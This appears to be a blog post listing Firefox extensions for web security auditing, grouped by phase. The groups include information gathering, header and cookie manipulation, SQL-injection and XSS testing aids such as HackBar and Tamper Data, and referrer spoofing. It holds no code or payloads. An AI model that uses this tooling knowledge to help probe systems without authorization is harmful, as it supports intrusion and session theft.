Internet is an amazing
virtual world where you can "virtually" do anything: gambling, playing,
watching movies, shopping, working, “VoIPying”, spying on other people and for
sure auditing remote systems.
The security testers’
community has a large panel of security tools, methodologies and much more to perform
their pentests and audit assessments. But what happens if you find yourself
weaponless.
No more Top 100 security
tools, no more LiveCDs and no more exploitation frameworks. A security auditor without toolbox
is like a cop without gun.
Nevertheless, there is
maybe a way to rescue yourself from this nightmare situation.
The magical solution
could be Firefox and its extensions developed by hackers and coders. If you don’t
want to do the work below then there is
a open source browser based security framework called mantra which comes with preconfigured with all the above extensions
+ many more. You can download it from H3R3
. Yeah!!
Here is a list of useful
security auditing extensions:
*Information Gathering*
Whois And Geo-location
Ø ShowIP : Show the IP address of the current page in the status bar.
It also allows querying
custom services by IP (right mouse button) and Hostname (left mouse button), like
whois, netcraft.
ØShazou : The product called Shazou (pronounced Shazoo it is Japanese
for mapping) enables the user with one-click to map and geo- locate any website
they are currently viewing.
Ø HostIP.info Geolocation : Displays Geolocation information for a website using
hostip.info data. Works with all versions of Firefox.
ØActive Whois : Starting Active Whois to get details about any Web site
owner and its host server.
ØBibirmer Toolbar : An all-in-one extension. But auditors need to play with
the toolbox. It includes (WhoIs, DNS Report, Geolocation, Traceroute, Ping).
Very useful for information gathering phase.
*Enumeration / Fingerprinting*
Ø Header Spy : Shows HTTP headers on statusbar.
Ø Header Monitor : This is Firefox extension for display on statusbar panel
any HTTP response header of top level document returned by a web server.
Example: Server (by default), Content Encoding, Content- Type, X-Powered-By and
others.
*Social Engineering*
ØPeople Search and Public Record : This Firefox extension is
a handy menu tool for investigators, reporters, legal professionals, real estate
agents, online researchers and anyone interested in doing their own basic
people searches and public record lookups as well as background research.
*Googling And Spidering*
ØAdvanced dork : Gives quick access to Google’s Advanced
Operators directly from the context menu. This
could be used to spider a site or scan for hidden files (this spider technique
is used via scroogle.org)
Ø SpiderZilla : Spiderzilla is an easy- to-use website mirror utility,
based on Httrack-Download from H3R3
ØView Dependencies : View Dependencies adds a tab to the "page info"
window, in which it lists all the files which were loaded to show the current
page. (useful for a spidering technique) Security Assessment / Code auditing
*Editors*
Ø JSView : The ’view page source’ menu item now opens files based on the
behaviour you choose in the jsview
options. This allows you to open the source code of any web page in a new tab
or in an external editor.
Ø Cert Viewer Plus : Adds two options to the certificate viewer in Firefox or
Thunderbird: an X.509 certificate can either be displayed in PEM format
(Base64/RFC 1421, opens in a new window) or saved to a file (in PEM or DER
format – and PKCS#7 provided that the respective patch has been applied - cf.
Ø Firebug : Firebug integrates with Firefox to put a wealth of development
tools at your fingertips while you browse. You can edit, debug, and monitor
CSS, HTML, and JavaScript live in any web page.
Ø XML Developer Toolbar: Allows XML Developer’s use of standard tools all from your
browser.
*Headers Manipulation*
Ø HeaderMonitor : This is Firefox extension for display on statusbar panel
any HTTP response header of top level document returned by a web server.
Example: Server (by default), Content Encoding, Content- Type, X-Powered-By and
others.
Ø RefControl : Control what gets sent as the HTTP Referrer on a per- site
basis.
Ø User Agent Switcher : Adds a menu and a toolbar button to switch the user agent
of the browser.
*Cookies Manipulation*
Ø Add N Edit Cookies : Cookie Editor that allows you add and edit "session"
and saved cookies.
ØCookieSwap : CookieSwap is an extension that enables you to maintain
numerous sets or "profiles" of cookies that you can quickly swap
between while browsing.
Ø httpOnly : Adds httpOnly cookie support to Firefox by encrypting cookies
marked as http Only on the browser side.
Ø Allcookies : Dumps ALL cookies (including session cookies) to Firefox standard
cookies.txt file.
*Security Auditing*
Ø HackBar : This toolbar will help you in testing SQL injections, XSS holes
and site security. It is NOT a tool for executing standard exploits and it will
NOT teach you how to hack a site. Its main purpose is to help a developer do
security audits on his code.
Ø Tamper Data : Use “tamper data” to view and modify HTTP/HTTPS headers and
post parameters.
Ø Chickenfoot : Chickenfoot is a Firefox extension that puts a programming
environment in the browser’s sidebar so you can write scripts to manipulate web
pages and automate web browsing. In Chickenfoot, scripts are written in a superset
of JavaScript that includes special functions specific to web tasks.*Misc*
*Hacks For Fun*
Ø Greasemonkey : Allows you to customize the way a webpage displays using
small bits of JavaScript (scripts could be download here)
Ø Encryption Fire
Encrypter : FireEncrypter is a Firefox
extension which gives you encryption/decryption and hashing functionalities
right from your Firefox browser, mostly useful for developers or for education
& fun.
*Malware Scanner*
Ø QArchive.org web files
checker : Allowing people to
check web files for any malware (viruses, trojans, worms, adware, spyware and
other unwanted things) inclusions.
Ø Dr.Web anti-virus link
checker :
Ø This plugin allows you to check any file you are about to
download, any page you are about to visit
Ø ClamWin Antivirus Glue
for Firefox : This extension scans
every downloaded file automatically with ClamWin.
*Anti Spoof*
Ø refspoof : Easy to pretend to origin from a site by overriding the URL
referrer (in a http request). — It incorporates this feature by using the pseudo-protocol
spoof:// .. Thus it’s possible to store the information in a
"hyperlink" – that can be used in any context... like html pages or
bookmarks.
Thanks For Visiting
